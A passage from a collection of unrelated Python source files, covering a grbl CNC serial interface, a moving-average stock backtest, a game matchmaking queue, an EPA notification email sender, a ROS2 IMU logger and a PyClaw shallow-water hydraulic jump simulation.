= 1\n self.currentJob[\"result\"] = \"Ok\"\n self.lastJob = self.currentJob\n self.historyQueue[self.currentJob[\"id\"]] = self.currentJob\n self.currentJob = None\n state = 0\n self.setMachineStatus(dict(id=None, status=\"Idle\", type=\"\"))\n else:\n self.logger.debug('continue file job ' + self.currentJob[\"fileName\"])\n self.exec_file(self.currentJob)\n\n def prep_file_job(self, job):\n # need to setup the file for reading\n job[\"grblCount\"] = 0\n self.logger.debug(\"prep file \" + job[\"fileName\"])\n job[\"fd\"] = open(job[\"fileName\"], 'r')\n job[\"charCounts\"] = []\n job[\"lineCount\"] = 0\n\n def cleanup_file_job(self, job):\n # need to setup the file for reading\n job[\"fd\"].close()\n job[\"fd\"] = None\n\n def exec_status(self):\n self.logger.debug(\"exec-status\")\n self.serialPort.write(\"?\".encode())\n result = self.serialPort.readline().strip()\n self.setStatus(result)\n self.logger.debug(\"exec-status:done\")\n\n def exec_file(self, job):\n\n grbl_out = ''\n\n # line = job[\"fd\"].readline(job[\"lineCount\"])\n line = job[\"fd\"].readline()\n\n l_block = re.sub('\\s|\\(.*?\\)', '', line).upper()\n\n if (l_block == \"\"):\n job[\"eof\"] += 1\n\n job[\"charCounts\"].append(len(l_block)+1)\n\n while sum(job[\"charCounts\"]) >= RX_BUFFER_SIZE-1 | self.serialPort.inWaiting():\n out_temp = self.serialPort.readline().strip() # Wait for grbl response\n if out_temp.find('ok') < 0 and out_temp.find('error') < 0:\n self.logger.debug(\" MSG: \\\"\"+out_temp +\n \"\\\"\") # Debug response\n else:\n if out_temp.find('error') >= 0:\n self.setMachineStatus(dict(error=out_temp, errorCount=job[\"errorCount\"]))\n job[\"errorCount\"] += 1\n\n job[\"grblCount\"] += 1 # Iterate g-code counter\n self.logger.debug(\n \"REC < \"+str(job[\"grblCount\"])+\": \\\"\"+out_temp+\"\\\"\")\n # Delete the block character count corresponding to the last 'ok'\n del job[\"charCounts\"][0]\n\n if (len(l_block) > 0):\n job[\"lineCount\"] += 1 # Iterate line counter\n self.setMachineStatus(dict(data=l_block));\n 
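# write only after the count loop above has confirmed free space in grbl's\n            # 128-byte RX buffer (RX_BUFFER_SIZE), so the controller is never overrun\n            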
self.serialPort.write(str.encode(l_block + '\\n')) # Send g-code block to grbl\n self.logger.debug(\n \"SND > \"+str(job[\"lineCount\"])+\": \\\"\" + l_block + \"\\\"\")\n\n # Wait until all responses have been received.\n while job[\"lineCount\"] > job[\"grblCount\"]:\n out_temp = self.serialPort.readline().decode().strip() # Wait for grbl response\n if out_temp.find('ok') < 0 and out_temp.find('error') < 0:\n self.logger.debug(\"-> MSG: \\\"\"+out_temp+\"\\\"\") # Debug response\n else:\n if out_temp.find('error') >= 0:\n self.setMachineStatus(dict(error=out_temp, errorCount=job[\"errorCount\"]))\n job[\"errorCount\"] += 1\n job[\"grblCount\"] += 1 # Iterate g-code counter\n\n # Delete the block character count corresponding to the last 'ok'\n del job[\"charCounts\"][0]\n if verbose:\n self.logger.debug(\n \"REC < \"+str(job[\"grblCount\"])+\": \\\"\"+out_temp + \"\\\"\")\n\n def exec_cmd(self, cmd, newline=True):\n\n if (not self.allowMdi):\n return \"\"\n\n self.logger.debug(\"SND > \"+cmd)\n self.setMachineStatus(dict(data=cmd));\n self.serialPort.write(cmd.encode())\n\n if newline:\n self.serialPort.write(\"\\n\".encode())\n\n resp = ''\n\n while 1:\n # Wait for grbl response with carriage return\n grbl_out = self.serialPort.readline().decode('utf8').strip()\n self.logger.debug(\"REC < \"+grbl_out)\n if grbl_out.find(\"Grbl\") >= 0:\n resp = ''\n elif grbl_out.find(\"ok\") >= 0:\n break\n elif grbl_out.find(\"error\") >= 0:\n self.setMachineStatus(dict(error=grbl_out, errorCount=1))\n break\n else:\n resp += grbl_out\n\n return resp\n","repo_name":"yaitde-x/borg-cnc","sub_path":"src/borg-py-api/machineinterface.py","file_name":"machineinterface.py","file_ext":"py","file_size_in_byte":12414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"69905414334","text":"import calendar\nimport datetime\nimport quandl\nfrom matplotlib.backends.backend_pdf import PdfPages\nfrom BasicFunctions import *\nimport matplotlib.pyplot as plt\nimport numpy\n\n\nmoving_averages = [5, 10, 15, 20]\ncombination_keys = [(moving_averages[i], moving_averages[j]) for i in range(len(moving_averages)) for j in range(i+1, len(moving_averages))]\ncombination_dict = {}\nfor i in combination_keys:\n combination_dict[i]= []\nmonths = [\"\", \"January\", \"February\", \"March\", \"April\", \"May\", \"June\", \"July\",\n \"August\", \"September\", \"October\", \"November\", \"December\"]\n\nticker = \"C\"\ndf = quandl.get('WIKI/' + ticker, api_key=\"T2K2v57vDVL9Wwx_ia3c\")\n\n# make it continuous dont start over each month\n# run it over whole month and then check stats\n# also run s&p 500\n# for each combination graph the curve for portfolio value\n# for each combination send the portfolio value curve\n# combination map to vector of portfolio value\n# calculate annualized return for a bunch of stuff\n# graph show plot as annualized return\nbest_yearly_performances = []\nbest_yearly_averages = []\nbest_total_averages = []\nbest_total_performances = []\nfor year in range(1977, 2018):\n best_yearly_performance = -float('inf')\n best_yearly_config = []\n best_monthly_performances = []\n best_monthly_averages = []\n for month in range(1, 13):\n last_day = calendar.monthrange(year, month)[1]\n dataset = df[\"Close\"][datetime.date(year, month, 1):datetime.date(year, month, last_day)]\n best_monthly_performance = -float('inf')\n best_monthly_config = []\n for i in range(len(moving_averages)-1):\n for j in range(i+1, len(moving_averages)):\n trade = ma_trade(dataset, 
moving_averages[i], moving_averages[j])\n hold = price_2_invest(dataset, trade)\n performance = ((hold[-1] - hold[0]) / hold[0]) * 100 # percentage\n combination_dict[(moving_averages[i], moving_averages[j])].append(performance)\n if performance > best_monthly_performance:\n best_monthly_performance = performance\n best_monthly_config = [moving_averages[i], moving_averages[j]]\n\n # end of a month\n if best_monthly_performance > best_yearly_performance:\n best_yearly_performance = best_monthly_performance\n best_yearly_config = best_monthly_config\n best_monthly_performances.append(best_monthly_performance)\n best_monthly_averages.append(best_monthly_config)\n print(months[month] + \" \" + str(year) + \":\")\n print(\"\\tBest Configuration:\\n\\tma_fast: \" + str(best_monthly_config[0]) + \"\\n\\tma_slow: \" + str(best_monthly_config[1]))\n print(\"Best Performance: \" + str(best_monthly_performance) + \"%\\n\\n\")\n\n # end of a year\n\n print(str(year) + \" Best: \")\n print(\"\\tBest Configuration:\\n\\tma_fast: \" + str(best_yearly_config[0]) + \"\\n\\tma_slow: \" + str(\n best_yearly_config[1]))\n print(\"Best Performance: \" + str(best_yearly_performance) + \"%\\n\\n\")\n best_total_averages.append(best_monthly_averages)\n best_total_performances.append(best_monthly_performances)\n best_yearly_performances.append(best_yearly_performance)\n best_yearly_averages.append(best_yearly_config)\n\n#graphing\nfig = plt.figure(figsize=(20, 3))\nax = fig.add_subplot(111)\nfor i in combination_dict.keys():\n ax.plot(combination_dict[i], label=str(i))\n\ndays = len(combination_dict[combination_keys[0]])\nplt.legend()\nplt.xticks(range(0, days, 10))\n# plt.figure(figsize=(20, 2))\n# plt.tight_layout()\nplt.show()\n# with PdfPages(r'C:\\Users\\arjun\\PycharmProjects\\QuantitativeStockSelectionAndTrading\\MovingAverageTest.pdf') as export_pdf:\n# export_pdf.savefig(fig)\n# plt.close()\n\n\"\"\"\nbest yearly performances:\nlist containing the largest percent gain in each year\nas many elements(floats) as there are years\nbest yearly averages:\nlist containing the best configuration of averages for each year\nas many elements(lists representing configuration) as there are years\nbest total averages:\nlist containing lists of the best configuration for each month (as many lists as there are years, with each list containing twelve lists of length 2 for the averages)\nbest total performances:\nlist containing lists of the best performances for each month (as many lists as there are years, with each list containing a list of length 12 for the performances)\n\nNOTE:\nbest yearly performances should select the max of each of the yearly lists in best total averages\nbest yearly averages should select the best of each of the yearly lists in best total averages, which correspond to the best performances for that year\n\"\"\"\n\n","repo_name":"arjnai21/QuantitativeStockSelectionAndTrading","sub_path":"oldstuff/TestMovingAverages.py","file_name":"TestMovingAverages.py","file_ext":"py","file_size_in_byte":4670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36233906553","text":"# src/matchmaking/queue_manager.py\n\nimport queue\nfrom src.classes.Match import Match\nfrom src.classes.Player import Player\nfrom src.config import MAX_MATCHES, MIN_MATCHES, MIN_PLAYERS, RANKS\n\n\nclass QueueManager:\n def __init__(self):\n self.matchmaking_queue = queue.Queue()\n self.matches = []\n\n def generate_match(self, level=None):\n if len(self.matches) >= 
MAX_MATCHES:\n return {\n \"error\": True,\n \"msg\": \"max matches\",\n \"code\": \"\",\n }\n\n m = Match(level)\n self.matches.append(m)\n return {\"error\": False}\n\n def generate_matches(self, num: int = MAX_MATCHES):\n print(num)\n for i in range(num):\n resp = self.generate_match()\n if resp.get(\"error\", None) == True:\n break\n\n def remove_player_from_queue(self, player_name):\n players_in_queue = []\n removed_player = None\n\n while not self.matchmaking_queue.empty():\n player = self.matchmaking_queue.get()\n\n if player.username == player_name:\n removed_player = player # Save the removed player\n else:\n players_in_queue.append(player)\n\n # Put back the remaining players into the queue\n for player in players_in_queue:\n self.matchmaking_queue.put(player)\n\n return removed_player\n\n def add_player_to_queue(self, player_details):\n self.matchmaking_queue.put(player_details)\n\n def get_all_players(self):\n players = []\n for i in range(self.get_queue_size()):\n player_d = self.matchmaking_queue.get()\n players.append(player_d)\n self.matchmaking_queue.put(player_d)\n return players\n\n def group_players_by_rank(players):\n grouped_players = {}\n\n for player in players:\n rank = player[\"rank\"]\n if rank not in grouped_players:\n grouped_players[rank] = []\n grouped_players[rank].append(player)\n\n return grouped_players\n\n def task(self):\n players = self.get_all_players()\n for b in players:\n b: Player\n\n match_found = False\n for x in self.matches:\n if match_found:\n break\n if x.ready:\n print(\"denied\", b.username, \"a match\")\n continue\n x: Match\n if x.level is None:\n x.add_player(b)\n b.match = x\n print(f\"[*] Found empty game for: {str(b)}\")\n self.remove_player_from_queue(b.username)\n match_found = True\n elif x.level == b.level:\n x.add_player(b)\n b.match = x\n print(f\"[*] Found game for: {str(b)}\")\n self.remove_player_from_queue(b.username)\n match_found = True\n\n else:\n print(f\"[*] Waiting on a game for {str(b)}\")\n\n # print(f\"Processed player: {str(b)}\")\n for i in self.matches:\n if i.ready:\n continue\n if len(i.players) - 1 >= MIN_PLAYERS:\n i.ready = True\n print(\"[*] Made match ready\")\n\n def get_player_from_queue(self):\n try:\n q = self.matchmaking_queue.get()\n for i in list(q):\n self.matchmaking_queue.put(i)\n\n return q\n except queue.Empty:\n return None\n\n def get_by_name(self, name):\n for i in range(self.get_queue_size()):\n q = self.matchmaking_queue.get()\n if q.uuid == name:\n return q\n self.matchmaking_queue.put(q)\n\n return None\n\n def get_by_uuid(self, uuid):\n for i in range(self.get_queue_size()):\n q = self.matchmaking_queue.get()\n\n if q.uuid == uuid:\n return q\n self.matchmaking_queue.put(q)\n\n return None\n\n def search_matches_uuid(self, uuid):\n for i in self.matches:\n for x in i.players:\n print(x)\n if x.uuid == uuid:\n return x\n\n return None\n\n def get_queue_size(self):\n return self.matchmaking_queue.qsize()\n","repo_name":"AJXD2/Matchmaking","sub_path":"src/matchmaking/queue_manager.py","file_name":"queue_manager.py","file_ext":"py","file_size_in_byte":4366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7712342343","text":"import scipy.io as spio\nfrom typing import List\nimport torch\nimport matplotlib.pyplot as plt\n\ndef read_mat(file_path:str, keys: List[str]):\n mat_data = spio.loadmat(file_path)\n result = []\n for k in keys:\n mat_extracted = mat_data[k]\n data = torch.from_numpy(mat_extracted)\n result.append(data)\n 
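# each value is now a torch tensor; from_numpy shares memory with loadmat's array\n    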
return result\n\ndef show_training_images(X, h, w):\n    m = X.shape[0]\n\n    def show_training_image(x):\n        reshaped_x = torch.reshape(x, (h,w))\n        reshaped_x = torch.rot90(reshaped_x, 3, [0, 1]) # not sure why it's 90 degrees off\n        reshaped_x = torch.fliplr(reshaped_x) # not sure why flipped\n        plt.imshow(reshaped_x)\n        plt.show()\n\n    for _ in range(min(m,10)):\n        from random import randint\n        i = randint(0, m-1)\n        show_training_image(X[i])\n\n\n\ndef main():\n    training_file = './ex4data1.mat'\n    X, y = read_mat(training_file, ['X', 'y'])\n    # print(X)\n    # print(y)\n    # print(X.shape)\n    show_training_images(X, 20, 20)\n\nmain()\n","repo_name":"balloonio/coursera-machine-learning-course","sub_path":"machine-learning-ex4/torch_ex4/ex4.py","file_name":"ex4.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
{"seq_id":"27729207999","text":"import rclpy\nfrom rclpy.node import Node\nfrom rclpy.qos import qos_profile_sensor_data\nfrom sensor_msgs.msg import Imu\nimport numpy\nimport yaml\n\n\nclass IMUDataLogger(Node):\n    labels = ['ax','ay','az']\n\n    def __init__(self):\n        super().__init__('imu_data_logger')\n        self.subscription = self.create_subscription(Imu,'/imu',self.listener_callback,qos_profile_sensor_data)\n        self.subscription \n        self.t0 = None\n        self.history = None\n        self.fig = None\n\n    def listener_callback(self, msg):\n        self.get_logger().info(\"received message\")\n\n        current_time = msg.header.stamp.sec+msg.header.stamp.nanosec*1e-9\n\n\n        if not self.t0:\n            self.t0 = current_time\n\n        t = current_time-self.t0\n\n        print(t)\n\n        if self.history is None:\n            self.history = numpy.array([[t, msg.linear_acceleration.x, msg.linear_acceleration.y, msg.linear_acceleration.z]])\n        else:\n            self.history = numpy.concatenate([self.history,numpy.array([[t, msg.linear_acceleration.x, msg.linear_acceleration.y, msg.linear_acceleration.z]])],0)\n\n\ndef main(args=None):\n    rclpy.init(args=args)\n\n    imu_data_logger = IMUDataLogger()\n\n    try:\n        rclpy.spin(imu_data_logger)\n#    except SystemExit:\n#        print('exiting')\n    except KeyboardInterrupt:\n        mydata = imu_data_logger.history.tolist()\n        mydict = {'data':mydata,}\n        with open('file.yaml','w') as f:\n            yaml.dump(mydict,f)\n\n    imu_data_logger.destroy_node()\n    rclpy.shutdown()\n\nif __name__ == '__main__':\n    main()\n\n","repo_name":"PraveenPaidi/Turtlebot4","sub_path":"FIR and Kalman filter/grab_data.py","file_name":"grab_data.py","file_ext":"py","file_size_in_byte":1572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
{"seq_id":"34758258632","text":"\"\"\"\nMain script to read and send emails from JSON files and upload batch report to s3 for the ESNC Risk Notification Project. \nExpected to be run on EPA's production Whippet. \n\nInstruction:\ntest: on Sherlock command line, run: \nsingularity exec $GROUP_HOME/singularity/epa_7-08-21_2.sif python3 -m 1_whippet_sender --mode test --run_id --system \nprod: on whippet command line, run (not tested)\npython3 -m 1_whippet_sender --mode prod --run_id --system whippet\n\nThe main script follows these steps:\n1. import installed packages and supporting modules\n2. set up directories and logging\n3. read email files from s3 bucket\n4. send email from whippet\n5. generate batch report \n6. save batch report to s3 bucket\n7. save logging file and sync with sherlock folder\n\nPrerequisites: \n1. must have run 0_email_maker first \n2. must have the email JSON files generated in s3 bucket\n3. 
must have programmatic permissions to the s3 bucket\n4. must have aws and credentials set up on whippet. default credentials are set to Nicole's credentials (hongjinl@law.stanford.edu)\n\nSee line-by-line test in tests/line_by_line_test_whippet_sender.ipynb: https://github.com/reglab/esnc_risk_notif/blob/main/code/tests/line_by_line_test_whippet_sender.ipynb\n\nThis script would take about 1 min to run. Check emails sent to reglabtest@gmail.com (test mode) and hongjinl@law.stanford.edu (test and prod mode). \n\"\"\"\n\n# import installed packages\nimport os\nimport argparse\n\nimport pandas as pd\nimport datetime as dt\nimport logging\n\n## for s3 connection\nimport boto3\nimport subprocess\n\n## for emailer\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nimport smtplib, ssl\n\n# import supporting modules\nimport configs\nfrom utilities import json_functions\n\ndef get_args():\n    \"\"\"\n    Use argparse to parse command line arguments.\n\n    Arguments\n    --------\n    mode: string\n        The runner mode for whippet_sender. Available options: prod and test. prod refers to production mode and test refers to testing mode.\n    run_id: string\n        The id of the email_maker run, required for reading email files from S3 bucket, in _ format, e.g. 2021Q3_2021-07-02_104040_958240\n    system: string\n        The system from where we are sending out the emails. Options: sherlock (Stanford) or whippet (EPA).\n    \"\"\"\n    parser = argparse.ArgumentParser(description=\"Use argparse to parse command line arguments. Required: mode, run_id.\")\n\n    parser.add_argument(\n        '--mode',\n        help='The runner mode for whippet_sender. Available options: prod and test. prod refers to production mode and test refers to testing mode.',\n        type=str,\n        required=True,\n        default='test'\n    )\n    parser.add_argument(\n        '--run_id',\n        help=\"The id of the email_maker run, required for reading email files from S3 bucket, in _ format, e.g. 2021Q3_2021-07-02_104040_958240\",\n        type=str,\n        required=True\n    )\n    parser.add_argument(\n        '--system',\n        help=\"The system from where we are sending out the emails. Options: sherlock (Stanford) or whippet (EPA).\",\n        type=str,\n        required=True\n    )\n\n    args = parser.parse_args()\n\n    return args\n\ndef main():\n    \"\"\"\n    Send emails from whippet and generate batch report. \n    \"\"\"\n    print(configs.HELPER_TEXT_WHIPPET_SENDER)\n    print(\"===== Start running whippet sender =====\")\n\n    ## get parsed variables\n    args = get_args()\n    mode = args.mode\n    run_id = args.run_id\n    system = args.system\n    assert mode in ['test', 'prod'], 'Expect mode to be in test or prod. Aborting.'\n    assert system in ['sherlock', 'whippet'], 'Expect system to be in sherlock or whippet. Aborting.'\n\n    ## get global variables\n    bucket = configs.BUCKET\n    s3_project_dir = configs.S3_PROJECT_DIR\n    prod_from_addr = configs.PROD_FROM_ADDR\n    test_from_addr = 'reglabtest@gmail.com' # 2021-08-04 hardcoded temporarily. Ideally, we would want to add an environment variable to the whippet system. configs.TEST_FROM_ADDR\n    test_to_addr = 'reglabtest@gmail.com' # see above. 
configs.TEST_TO_ADDR\n test_addr_pwd = configs.TEST_ADDR_PWD\n test_bcc_addr = configs.TEST_BCC_ADDR \n\n ## set directories based on mode and run_id \n s3_run_dir = os.path.join(mode, run_id)\n s3_emails_dir = os.path.join(s3_run_dir, 'emails')\n s3_log_dir = os.path.join(s3_run_dir, 'logs')\n\n ## configure logging\n logger, log_capture_string = configs.configure_logging(logger_name = 'whippet_sender')\n logger.info(configs.HELPER_TEXT_WHIPPET_SENDER)\n logger.info(\"Configured logger\")\n logger.info(\"----- Parsed variables: mode = {}, run_id = {}\".format(mode, run_id))\n logger.info(\"----- S3 bucket: s3_project_dir = {}, s3_run_dir = {}\".format(s3_project_dir, s3_run_dir))\n logger.info(\"----- From email address: {}\".format(test_from_addr if system == 'sherlock' else prod_from_addr))\n logger.info(\"----- To email address: {}\".format(test_to_addr if mode == 'test' else 'facility addresses'))\n\n ## print out variables and let the user confirm if they are correct and wish to proceed. \n print(\"----- Parsed variables: mode = {}, run_id = {}\".format(mode, run_id))\n print(\"----- S3 bucket: s3_project_dir = {}, s3_run_dir = {}\".format(s3_project_dir, s3_run_dir))\n print(\"----- From email address: {}\".format(test_from_addr if system == 'sherlock' else prod_from_addr))\n print(\"----- To email address: {}\".format(test_to_addr if mode == 'test' else 'facility addresses'))\n\n proceed = input('Please verify the above variables. Do you wish to proceed with the run? [y/n]')\n\n # if proceed, run the rest of the script\n if proceed == 'y':\n logger.info('====== 1/7 Reading email files from s3 bucket =======')\n email_dicts = json_functions.read_emails_from_json(s3_emails_dir, s3=True, bucket=bucket)\n\n logger.info('====== 2/7 Generating email objects with dictionaries =======')\n notif_permits = [e['npdes_permit_id'] for e in email_dicts]\n logger.info(f'for the following permit ids (totalling {len(notif_permits)} permits): {notif_permits}')\n \n logger.info(f'======== 3/7 Sending emails with whippet sender mode: {mode} =========') \n # compile emails\n for email in email_dicts:\n logger.info(f\"Compiling email for {email['npdes_permit_id']}\")\n msg = MIMEMultipart('alternative')\n msg['Subject'] = email['subject']\n msg.attach(MIMEText(email['header'] + email['body'], 'html'))\n email['whippet_sender_mode'] = mode\n\n # send emails\n logger.info(f'Sending email to test email address {test_to_addr}')\n if mode == 'test':\n msg['To'] = test_to_addr\n msg['BCC'] = test_bcc_addr\n\n # sending out from sherlock: using a test gmail account\n if system == 'sherlock': \n msg['From'] = test_from_addr\n password = test_addr_pwd\n port = 465 # For SSL\n smtp_server = \"smtp.gmail.com\"\n context = ssl.create_default_context()\n with smtplib.SMTP_SSL(smtp_server, port, context=context) as server:\n server.login(msg['From'], password)\n server.send_message(msg)\n\n # sending out from whippet: using epa's production email \n ## to be tested on whippet\n if system == 'whippet':\n msg['From'] = prod_from_addr\n with smtplib.SMTP('localhost', port=25) as server: \n server.send_message(msg)\n \n elif mode == 'prod':\n msg['From'] = prod_from_addr\n msg['To'] = email['to_addrs']\n msg['BCC'] = email['bcc_addrs']\n\n with smtplib.SMTP('localhost', port=25) as server: \n server.send_message(msg)\n \n email['email_sent_timestamp'] = dt.datetime.now()\n email['email_sent_from_addr'] = msg['From']\n email['email_sent_to_addr'] = msg['To']\n email['bcc_addrs'] = msg['BCC']\n\n logger.info('====== 4/7 
Generating batch report as dataframe =======')\n cols = ['npdes_permit_id', \n 'fiscal_quarter', \n 'to_addrs', \n 'bcc_addrs',\n 'whippet_sender_mode',\n 'email_sent_timestamp',\n 'email_sent_from_addr',\n 'email_sent_to_addr',\n 'email_template',\n 'subject',\n 'header',\n 'body'\n ]\n batch_report = pd.DataFrame(email_dicts)[cols]\n\n logger.info('======= 5/7 Saving batch report to s3 bucket ========')\n ## to_csv works on sherlock but not on whippet. Missing dependency within pandas\n ## work around: saving csv to the repo folder first, then copy that to S3 bucket, then remove the csv from the repo folder.\n #batch_report.to_csv(os.path.join(s3_project_dir, s3_run_dir,'batch_report.csv'), index = False)\n batch_report.to_csv('batch_report.csv', index = False)\n\n logger.info('======= 6/7 Subset and save KY batch report to s3 bucket ======')\n ky_batch_report = batch_report[batch_report.npdes_permit_id.str.startswith('KY')]\n #ky_batch_report.to_csv(os.path.join(s3_project_dir, s3_run_dir, 'batch_report_ky.csv'))\n ky_batch_report.to_csv('batch_report_ky.csv', index=False)\n\n os.system(f'aws s3 cp batch_report.csv {s3_project_dir}/{s3_run_dir}/batch_report.csv')\n os.system(f'aws s3 cp batch_report_ky.csv {s3_project_dir}/{s3_run_dir}/batch_report_ky.csv')\n os.system('rm batch_report*.csv')\n\n logger.info('========= 7/7 Saving logging file to s3 bucket =========')\n logger.info(f'Script FINISHED. Log file saved in S3 bucket {s3_log_dir}. Note: not yet synced with Sherlock oak folder.')\n logger_obj = bucket.Object(os.path.join(s3_log_dir, 'whippet_sender.log'))\n logger_obj.put(Body=log_capture_string.getvalue())\n\n print(\"===== Finish running whippet sender =====\")\n else:\n print('Script discontinued by user. Exiting.')\n\nif __name__ == \"__main__\":\n main()\n \n","repo_name":"nicole-hjlin/esnc_risk_notif","sub_path":"1_whippet_sender.py","file_name":"1_whippet_sender.py","file_ext":"py","file_size_in_byte":10505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36649947394","text":"from flask import jsonify, request\nfrom routes.router import app,resource,response,req,reqpar\n\nfrom app.services.SplanesCategory import SplanesCategory\nfrom app.models.Mproduct import ModelProduct\n\nimport json\nimport time\nimport collections\n\nclass RplanesCategory(resource):\n \"\"\"docstring for RplanesCategory.\"\"\"\n\n def __init__(self):\n pass\n\n def get(self):\n objectoJson = {'Mensaje':None,'Resultados':[]}\n\n try:\n requestReturn = SplanesCategory().GET_ALL_PUBLIC_CATEGORY()\n listJson = json.dumps(requestReturn)\n\n jsonTemplate = response(listJson,status=200, mimetype='application/json')\n jsonTemplate.headers['Access-Control-Allow-Origin'] = '*'\n print(\"____________________________________\")\n print(jsonTemplate)\n print(\"____________________________________\")\n print(\"Process select OK\")\n return jsonTemplate\n except Exception as exp:\n print(exp)\n return {'Mensaje':'Problema interno'},500\n","repo_name":"jose55mase/servise_kiero_broco","sub_path":"routes/add_route/RplanesCategory.py","file_name":"RplanesCategory.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"73389164092","text":"\"\"\"\nCode to simulate 2D circular hydraulic jump in PyClaw.\n\nThis version uses a mapped (annular) grid.\n\nIn order to get a jump, you must either introduce a bathymetric barrier (circular ring),\ninclude bottom 
friction, or impose a subcritical flow at the outer boundary.\nBathymetry is not enabled for the mapped grid solver at present.\n\"\"\"\n\nfrom matplotlib import animation\nimport matplotlib.pyplot as plt\nfrom clawpack import pyclaw\nimport numpy as np\nfrom mapc2p import mapc2p, mapc2p_annulus\n\n# If plotting in a Jupyter notebook, do this:\n#from clawpack.visclaw.JSAnimation import IPython_display\n\n# Mapped grid parameters\nr_lower = 0.1\nr_upper = 1.0\ntheta_lower = 0.0\ntheta_upper = 2*np.pi\n\ndef compute_geometry(grid):\n r\"\"\"Computes\n a_x\n a_y\n length_ratio_left\n b_x\n b_y\n length_ratio_bottom\n cell_area\n \"\"\"\n\n dx, dy = grid.delta\n area_min = 1.e6\n area_max = 0.0\n\n x_corners, y_corners = grid.p_nodes\n\n lower_left_y, lower_left_x = y_corners[:-1,:-1], x_corners[:-1,:-1]\n upper_left_y, upper_left_x = y_corners[:-1,1: ], x_corners[:-1,1: ]\n lower_right_y, lower_right_x = y_corners[1:,:-1], x_corners[1:,:-1]\n upper_right_y, upper_right_x = y_corners[1:,1: ], x_corners[1:,1: ]\n\n a_x = upper_left_y - lower_left_y #upper left and lower left\n a_y = -(upper_left_x - lower_left_x)\n anorm = np.sqrt(a_x**2 + a_y**2)\n a_x, a_y = a_x/anorm, a_y/anorm\n length_ratio_left = anorm/dy\n\n b_x = -(lower_right_y - lower_left_y) #lower right and lower left\n b_y = lower_right_x - lower_left_x\n bnorm = np.sqrt(b_x**2 + b_y**2)\n b_x, b_y = b_x/bnorm, b_y/bnorm\n length_ratio_bottom = bnorm/dx\n\n area = 0*grid.c_centers[0]\n area += 0.5 * (lower_left_y+upper_left_y)*(upper_left_x-lower_left_x)\n area += 0.5 * (upper_left_y+upper_right_y)*(upper_right_x-upper_left_x)\n area += 0.5 * (upper_right_y+lower_right_y)*(lower_right_x-upper_right_x)\n area += 0.5 * (lower_right_y+lower_left_y)*(lower_left_x-lower_right_x)\n area = area/(dx*dy)\n area_min = min(area_min, np.min(area))\n area_max = max(area_max, np.max(area))\n\n return a_x, a_y, length_ratio_left, b_x, b_y, length_ratio_bottom, area\n\n\ndef plot_surface(claw, make_anim=True, save_plots=False, frames=101, val='surface',\n vmin=0., vmax=0.5, clim=None, bathymetry=False, plotdir='./_plots'):\n \"\"\"\n Plot results of 2D shallow water simulation as a pcolor plot and animate\n (intended for Jupyter notebook).\n\n If variable bathymetry is used, set bathymetry=True.\n \"\"\"\n print('plotting')\n fig = plt.figure(figsize=[10,10])\n ax1 = fig.add_subplot(111)\n try:\n # Use solution in memory\n frame = claw.frames[0]\n except:\n # Read solution from disk\n frame = pyclaw.Solution(0,path=claw,read_aux=bathymetry)\n if bathymetry:\n b = frame.aux[0,:,:]\n else:\n b = 0.\n h = frame.q[0,:,:]\n if val == 'surface':\n qq = np.maximum(b,h+b)\n elif val=='u':\n hu = frame.q[1,:,:]\n qq = hu #/h\n \n\n x, y = frame.state.grid.p_centers \n\n im = ax1.imshow(qq.T, #cmap='Blues',\n extent=[x.min(), x.max(), y.min(), y.max()],\n vmin=vmin, vmax=vmax,\n interpolation='nearest', origin='lower')\n \n plt.colorbar(im)\n def fplot(frame_number):\n try:\n frame = claw.frames[frame_number]\n except:\n frame = pyclaw.Solution(frame_number,path=claw,read_aux=bathymetry)\n h = frame.q[0,:,:]\n if val == 'surface':\n qq = np.maximum(b,h+b)\n elif val=='u':\n hu = frame.q[1,:,:]\n qq = hu #/h\n im.set_data(qq.T)\n if clim:\n im.set_clim(*clim)\n if save_plots:\n fname = plotdir+'/frame'+str(frame_number).zfill(4)+'.eps'\n fig.savefig(fname) \n return im,\n\n if make_anim:\n return animation.FuncAnimation(fig, fplot, frames=frames, interval=40, repeat=True)\n elif save_plots:\n import os\n if not os.path.exists(plotdir):\n 
os.makedirs(plotdir)\n for i in range(frames):\n fplot(i)\n\n\ndef jet(state, dim, _, qbc, __, num_ghost):\n \"Jet inflow BC at inner boundary.\"\n h0 = state.problem_data['h0']\n u0 = state.problem_data['u0']\n\n xc, yc = state.grid.p_centers_with_ghost(num_ghost)\n rc = np.sqrt(xc**2 + yc**2)\n \n if dim.name == 'r':\n qbc[0,:num_ghost,:] = h0\n qbc[1,:num_ghost,:] = h0*u0*xc[:num_ghost,:]/r_lower\n qbc[2,:num_ghost,:] = h0*u0*yc[:num_ghost,:]/r_lower\n\ndef subsonic_boundary_upper(state, dim, _, qbc, __, num_ghost):\n \"Subsonic outflow BC at fixed Froude number.\"\n xc, yc = state.grid.p_centers_with_ghost(num_ghost)\n rc = np.sqrt(xc**2 + yc**2)\n #rc, thetac = state.grid.c_centers_with_ghost(num_ghost)\n r0 = r_lower\n h0 = state.problem_data['h0']\n u0 = state.problem_data['u0']\n beta = r0*h0*u0\n F = state.problem_data['F_bdy'] # Froude number at boundary\n g = state.problem_data['grav']\n \n h = (beta/(rc*F*np.sqrt(g)))**(2./3)\n unorm = beta / (rc*h)\n \n if dim.name == 'r':\n qbc[0,-num_ghost:,:] = h[-num_ghost:,:]\n qbc[1,-num_ghost:,:] = h[-num_ghost:,:]*unorm[-num_ghost:,:]*xc[-num_ghost:,:]/(rc[-num_ghost:,:]+1.e-7)\n qbc[2,-num_ghost:,:] = h[-num_ghost:,:]*unorm[-num_ghost:,:]*yc[-num_ghost:,:]/(rc[-num_ghost:,:]+1.e-7)\n else:\n raise Exception(dim)\n \ndef step_friction(solver, state, dt):\n 